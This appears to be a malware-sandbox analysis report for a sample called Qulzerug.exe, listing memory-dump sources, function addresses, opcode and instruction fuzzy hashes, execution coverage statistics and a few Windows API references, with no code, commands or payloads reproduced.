Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4c8f9d6d0e2df62b93543acf087e5ce190a0062418b63b9e7ae74549cf92a0
Instruction ID: 67ae35546f50e653be3a70da669bb9fea97ec0955433d551e90509f1f299bdd0
Opcode Fuzzy Hash: fc4c8f9d6d0e2df62b93543acf087e5ce190a0062418b63b9e7ae74549cf92a0
Instruction Fuzzy Hash: E1F0DA78608119CFDB59DF68C849ADAB3B5FB4C300F1050E9E519A7398DB38AE818F51

Function 08635270 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction ID: d43ca15d218048dd1901ee2c9db8deda00f3103ca772ea2fb813d2ded87949eb
Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction Fuzzy Hash: 2EE0E574E04208EFCB94DFA8D545AACFBF4EB88300F10C0AAD819A3345D635AA52DF81

Function 0863BEB8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction ID: ca08fe0a4e953861da3044271b14f3c16922011f05abce8239e3a352b84c5597
Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction Fuzzy Hash: 4BE0C974D04208EFCB94DFA8E54069DBBF4EB88311F10C0AAD918A3341D6759A51DF41

Function 0863EED0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e33c8114aebaac26e69142f8b7622fd51e4f3ee9f93e6a5c8fcf5cc9e6dfd2
Instruction ID: 0ac3cee1c5c09939245ca7da7c26a4ee5ad125d0d73a8bbae8c1d6a010561ac7
Opcode Fuzzy Hash: 87e33c8114aebaac26e69142f8b7622fd51e4f3ee9f93e6a5c8fcf5cc9e6dfd2
Instruction Fuzzy Hash: D2E08674908218EBC744DFA4E54096DBFB8AB85301F1090ADE84857341C6329A42DBA1

Function 08637DC0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f7df55dfd12023940a0c4060d439fefdc2dbd7cea48408edc55e7c4370cd3b
Instruction ID: 2cbf0f0de1f6e5de100bacf7744d83c46208e5632f4582e2d4a1d2bf910169b8
Opcode Fuzzy Hash: 07f7df55dfd12023940a0c4060d439fefdc2dbd7cea48408edc55e7c4370cd3b
Instruction Fuzzy Hash: C1E01A74D04208EBCB54DF98D5406ACBBB4AF88201F1080EAC81863345DA355A42DF45

Function 0863CD98 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858fa55789cbdf40ed351e802139fba7dfced51c8fa5d6d127c0b9c808192639
Instruction ID: b3e1c8917bffe9e3302c18666084d159de0c2f3f6928ad1d3f1010edc9ec1594
Opcode Fuzzy Hash: 858fa55789cbdf40ed351e802139fba7dfced51c8fa5d6d127c0b9c808192639
Instruction Fuzzy Hash: 49E01274909218DBCB54DF94E5416ACBFB8EB85305F1091EEE80827345DA316E42DB81

Function 0863D148 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25e67364c3b2713b6cb1a1588e2e9c42908fe2427ab22b7f69a8ae500466e7e
Instruction ID: 3f0d0cf9ea58703463258952491dda4e527fdbd120af37c0b0c3632fc2a45607
Opcode Fuzzy Hash: e25e67364c3b2713b6cb1a1588e2e9c42908fe2427ab22b7f69a8ae500466e7e
Instruction Fuzzy Hash: E7C02B7004E314C3C1E51F44700C33033FDC783203F053820E40C00261C66C20C0D342

Analysis Process: Qulzerug.exePID: 1816, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 0809DA70 Relevance: .3, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ddad44cc54540c937eaf4ba7f2031ceeca479f8951f54beddb4adf4a688a23
Instruction ID: 6b7a431c6b061557d0416d18268a45a2fc39a075cffa49b0468f4658a4e95e75
Opcode Fuzzy Hash: 53ddad44cc54540c937eaf4ba7f2031ceeca479f8951f54beddb4adf4a688a23
Instruction Fuzzy Hash: 67D1A174E41218CFDB54DFA9D990A9DBBB2FF89300F2081A9D409AB365DB31AD85CF50

Function 0809EF18 Relevance: 1.6, Strings: 1, Instructions: 343
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 0809F179

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: b65b97582982b8e9da7c67fd0f02e8bb42c37bc1e1800c4e0658f4e0f04b4410
Instruction ID: 4312afcb43e1472081113889f4aaff6173d8212f9c5cda62b428e24e4ff619b0
Opcode Fuzzy Hash: b65b97582982b8e9da7c67fd0f02e8bb42c37bc1e1800c4e0658f4e0f04b4410
Instruction Fuzzy Hash: 03D14934600602CFCB24DF69C484A6AB7F3FF89311B158669D49ADB7A1DB31F856CB90

Function 00C0FEB8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C0FF2C

Memory Dump Source

Source File: 0000000B.00000002.1519015333.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c00000_Qulzerug.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c4a328eed99e9d6faed7eeecd280e9f6158f6020dad668af25b2a5a2692dd87a
Instruction ID: 1b35d62c3a0a3ff8479f4fcb5954cb1a0f52cf4c8107a0fa14e2605227b60f71
Opcode Fuzzy Hash: c4a328eed99e9d6faed7eeecd280e9f6158f6020dad668af25b2a5a2692dd87a
Instruction Fuzzy Hash: 701115B1D043098FDB20DFAAC480B9EFBF5EF48310F148429D419A7240C775A941CFA0

Function 0809F460 Relevance: .5, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75578e6285c6735ae76f3ea6296148af5255c35155e0fecf731537c41994f40a
Instruction ID: 70746a32fabde12bdabef171d412d760c425bd81e072c04c2f094680f35ec48c
Opcode Fuzzy Hash: 75578e6285c6735ae76f3ea6296148af5255c35155e0fecf731537c41994f40a
Instruction Fuzzy Hash: 48127C71A00605DFCB24DFA9C484AAEB7F6FF88301B24852DD446DB791DB35AC46CB91

Function 00AAD030 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1518124378.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_aad000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d52342c594136b752596881d8fffcf9d33bad6187cb464c97eaa333e78b1d6
Instruction ID: b42bb0847a3fe6396c304db49a95d3e518c1916f6870abeda44ea11546535149
Opcode Fuzzy Hash: 65d52342c594136b752596881d8fffcf9d33bad6187cb464c97eaa333e78b1d6
Instruction Fuzzy Hash: DA2125B1504244DFDB15DF14D9C4B26BB65FB85314F24C569D88B0BA86C336D806CBA2

Function 0809F330 Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb6677f310a3a9e5e3cb3a2915fe13fa4664b48cba37ec25e348e8addf6ff0ec
Instruction ID: 3ed4e7c75142d0f2e5f44c9897af52920e1c8a8175707060e84fc2447aaf5704
Opcode Fuzzy Hash: cb6677f310a3a9e5e3cb3a2915fe13fa4664b48cba37ec25e348e8addf6ff0ec
Instruction Fuzzy Hash: 3821F571A00209CFDB04DF98C585ADDB7F2AF8C301F2045A9E449BB2A1DB75AD45CBA0

Function 00AAD02B Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1518124378.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_aad000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
Instruction ID: c091732614e3f3d1652a72082b9c32a8fbe873e764e9ca55c7008391e3885c8b
Opcode Fuzzy Hash: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
Instruction Fuzzy Hash: B211D376504280CFCB12CF10D9C4B16BF71FB85314F24C2AAD84A0BA56C33AD81ACBA2

Function 0809DEF8 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e3334da6ccafe646d2f30638e2e0aacaa3313fc9668becf39e9745af6fd620
Instruction ID: 581e1f7e86d1fab6aa07411b1c391f94599f9c0e4c17ddfa97129df4ec6aed3c
Opcode Fuzzy Hash: c6e3334da6ccafe646d2f30638e2e0aacaa3313fc9668becf39e9745af6fd620
Instruction Fuzzy Hash: A911F7B4E00209DFDB44DFA9C9467AEBBF5FF88300F20806AD419A7355DA709A418F91

Function 0089D76D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1510823826.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_89d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041c7e8f23b8e7c266fd23f5ff393499067f7884d181f51b2cbf959d6fa1019d
Instruction ID: 19a1a5106190f0aec46f1b813a73b2e020bbf6d53cf4995345bbc4cfe5e9b458
Opcode Fuzzy Hash: 041c7e8f23b8e7c266fd23f5ff393499067f7884d181f51b2cbf959d6fa1019d
Instruction Fuzzy Hash: 2901A771504344AFEB205A55DDC4766BBD8FF41328F1CC41AED498A682C6799840CA76

Function 0089D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1510823826.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_89d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfb014b7e306670c48e8ee78e842160da9264c09458721a8f7e7ccabd5ecae4
Instruction ID: f87524502e0f286064d491c241a65892b124c6f5d9a7966d6ca011f6c3c0df71
Opcode Fuzzy Hash: 8bfb014b7e306670c48e8ee78e842160da9264c09458721a8f7e7ccabd5ecae4
Instruction Fuzzy Hash: EEF0CD72408344AEEB208A16DCC4B62FF98FB41728F28C45AED484F686C2789C40CAB1

Function 0808915F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d79fda6901a9b262d6f7bda0c976839a8c6da3f3c9ab5c65588c32c73862af
Instruction ID: 15eb31fb184dbf416661a0a837c0098236d787afc7d6ea4f07007e8d942c39ae
Opcode Fuzzy Hash: f3d79fda6901a9b262d6f7bda0c976839a8c6da3f3c9ab5c65588c32c73862af
Instruction Fuzzy Hash: C001E870A01518DFCB64EF18CC48A9AB7B1EB48305F0050E6E50AA7759DB34AF858F11

Function 08081374 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1aaa71547a0b27a4bb41ae36804b9ff09b25d13bd2272c183bb703a4ff22e3b
Instruction ID: 86cf83819cc2e536b781dd346bd2eaf2fa1b19d11639c6688f21f7535f58f1e4
Opcode Fuzzy Hash: a1aaa71547a0b27a4bb41ae36804b9ff09b25d13bd2272c183bb703a4ff22e3b
Instruction Fuzzy Hash: EE01E574A011288FCBA1DF28D984A99B7F5FB48700F0040E9E40DAB354DB346F84CF10

Function 0809E2A8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 354c74d093081f6bbccc49b5e27e854db1e76e488c6e5f2286f234dd0597b2e8
Instruction ID: 55404430ea4440351fc427a05defdbecc1f9b5459cbcc0e739f16c2da0370ae5
Opcode Fuzzy Hash: 354c74d093081f6bbccc49b5e27e854db1e76e488c6e5f2286f234dd0597b2e8
Instruction Fuzzy Hash: D0F01574D08248EFCB80DFA8D840AADBBF9AB4D211F14C0EAE899D3341D6359A11EF50

Function 08099418 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction ID: a559bbe402f880730f38dadfaa2463a4873472fcd549d6638b252ea6fb5855e4
Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction Fuzzy Hash: 03E0C975D04208EFCB84DFA8D941A9DBBF5EB49311F10C0AE984993351D7359A51EF41

Function 08081159 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107ded89372075c6c7e9afec5a5082d13738e0542ea6059e1c4f1533ca76c834
Instruction ID: 83b03f403a25c4a30ae7d609b3df5359fb960d814791cf020d402d0cdcea1eb1
Opcode Fuzzy Hash: 107ded89372075c6c7e9afec5a5082d13738e0542ea6059e1c4f1533ca76c834
Instruction Fuzzy Hash: D1F0B7746081198FDB54EF28C844A9AB3F1EB48304F1440E9E51A97399D734AF858F51

Function 0809C560 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction ID: 416058cbf7bf38310f92400ad50bb72dab5e2c00c9ef9ec61aec8078a75dfc88
Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction Fuzzy Hash: 5AE0ED74D04208EFCB84DFA8D94069DFBF5EB59300F10C1AAD85993351D7359A51EF41

Function 08095270 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction ID: 7ff79c287cc908c641a5fa256cf6bb14c02075056a585904b1e71e06b443f7f6
Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction Fuzzy Hash: D0E0C974D04208EFCB84DFA9D9406ADBBF5EB49300F10C0AA985993351D6359A51EF41

Function 0809BEB8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction ID: 4133caf7cbc9b9c42037276dfae453f3d0714a4c7d6480639da8a5653a5c2fcd
Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
Instruction Fuzzy Hash: 51E0C974D04208EFCB84DFA8D94069DBBF9EB89311F10C0AA9949A3351D7759A51EF41

Function 0809EED0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fba2d71dfb88184723f47cd03ab1da80ca81902dc5dcd4cffc725455450baa6
Instruction ID: 777794c7da506db0f9eefef419a5f251e8a72239fef6d5e805eaa1766bc9e696
Opcode Fuzzy Hash: 8fba2d71dfb88184723f47cd03ab1da80ca81902dc5dcd4cffc725455450baa6
Instruction Fuzzy Hash: E8E08674908208EBCB44DFA8D940A6DBFB9AB4A301F1080ADE84957341C7719E42EBA1

Function 08097DC0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d94875ce722b7bb4060f393972f9a5707795da63698799c42c5081392f4338
Instruction ID: d74e505255e70b52aa3d4f886a54ae48f48bf3e6176e68a80d4dea74b9726724
Opcode Fuzzy Hash: 80d94875ce722b7bb4060f393972f9a5707795da63698799c42c5081392f4338
Instruction Fuzzy Hash: 3CE01A34D09208EBCB54DF98D5416ACBBF9AB89201F1080EAC85953381DB355A02EB41

Function 0809CD98 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83a4849a87b94ab663d7814215b840622c47e1f26d36de4574781c7a48e1656
Instruction ID: 6c8647c095cf44b54f3fd3daf3317f9d024d3121cd3e05d69f38ed2832bcd368
Opcode Fuzzy Hash: b83a4849a87b94ab663d7814215b840622c47e1f26d36de4574781c7a48e1656
Instruction Fuzzy Hash: E6E01234D09208DBDB54DF98E9416ADBFBDEB86305F1091EEC84917351DB315E42EB81

Function 0809D148 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49d6b5a404b30a011b253f1b548aa60e07a298b0d9c419ff902244d015bf30a6
Instruction ID: e1279b21dffdd9024707affd996a21cf0f95daf3ad1c305160f6b3c7b6b30961
Opcode Fuzzy Hash: 49d6b5a404b30a011b253f1b548aa60e07a298b0d9c419ff902244d015bf30a6
Instruction Fuzzy Hash: 90C08C3208A2048BD9905F88B80833933ED8787202F442814A90E0016396680040E146

Analysis Process: Qulzerug.exePID: 7536, Parent PID: 8060COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	87
Total number of Limit Nodes:	9

Executed Functions

Function 0161DD60 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1879libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161E647

Strings

Y, xrefs: 0161FCF4

Memory Dump Source

Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 3d0b149aa046d611a0164905e650bcb7092cfd9c474121229fe77578804917c3
Instruction ID: 7250919af5b59d1f26f5494aae54ce14bb9144a17f74646ac06455a80f58ed6a
Opcode Fuzzy Hash: 3d0b149aa046d611a0164905e650bcb7092cfd9c474121229fe77578804917c3
Instruction Fuzzy Hash: 8E132A71D106198ECB25EF68C884AADF7B1FF89300F55C6D9D458AB225EB70AAC5CF40

Function 0161DD57 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 771libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161E647

Strings

Y, xrefs: 0161FCF4

Memory Dump Source

Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 3d65fe5e9c58538fd719b742fafbffa16456c63c2a2fb0b3bb6e74d4bc44c4ec
Instruction ID: ffd1fbc09de99b32d691d6e946ff3ffe11cd5002c88a8b3cc64e9062363f32fb
Opcode Fuzzy Hash: 3d65fe5e9c58538fd719b742fafbffa16456c63c2a2fb0b3bb6e74d4bc44c4ec
Instruction Fuzzy Hash: 80821A70D006198FCB64EF69C884A9DFBF1FF89304F54C69AD458AB215EB70AA85CF41

Function 06D5D258 Relevance: 2.5, APIs: 1, Instructions: 978
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D5D2D9

Memory Dump Source

Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a4dadbf74bff4022e9840528534741d9ff00127bd61b1e563d82a6aa9585d6ad
Instruction ID: a13343c0e736fce6d522e2345180b0d9dba2e16d57e03242647449b469f3cae6
Opcode Fuzzy Hash: a4dadbf74bff4022e9840528534741d9ff00127bd61b1e563d82a6aa9585d6ad
Instruction Fuzzy Hash: 6D820870B002148FDBA4EF79C854BAEB7F2BF88704F2584A9D419EB394DE71AD418B51

Function 06D5D24B Relevance: 2.3, APIs: 1, Instructions: 764
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D5D2D9

Memory Dump Source

Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa282d2e0e2a9e9bcaf409938c9736883478968a9261f5375d73abc1330147c8
Instruction ID: 68cf860220b6d45ce9190e751c12854559aee16ded40bd8dca1993e1799018ea
Opcode Fuzzy Hash: aa282d2e0e2a9e9bcaf409938c9736883478968a9261f5375d73abc1330147c8
Instruction Fuzzy Hash: 45620870A002148FDBA4EF79C854BAEBBF2BF88704F2184A9D419AB395DE719D41CF51

Function 06DEDCB0 Relevance: 1.9, APIs: 1, Instructions: 446
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DEDCCF

Memory Dump Source

Source File: 0000000C.00000002.2525433407.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6de0000_Qulzerug.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b520fecdd182121ae7f16ba4e72e7e757a76db222c7db363a5ab76bc3a95fbb3
Instruction ID: 3f662c6af55138fc759252a646a6eef54f321b3aad67b5f72105e201ed911a0a
Opcode Fuzzy Hash: b520fecdd182121ae7f16ba4e72e7e757a76db222c7db363a5ab76bc3a95fbb3
Instruction Fuzzy Hash: 42025D70E002098FDB54DFA9C884B9EBBF2BF88304F258569D419AB395DB74EC45CB90

Function 0161A7F0 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4caa2b1af34a251a13f73b2ea9cd5dde516157fe5f991d5c623f374260d2dd0c
Instruction ID: ca5122aedd6784231eef276308a31182e4b008fa1594c699e6ba1f10fdbac025
Opcode Fuzzy Hash: 4caa2b1af34a251a13f73b2ea9cd5dde516157fe5f991d5c623f374260d2dd0c
Instruction Fuzzy Hash: E2412372D003998FCB14DFB9D8003EEBBF5BF89210F19856AC844A7341EB789945CB90

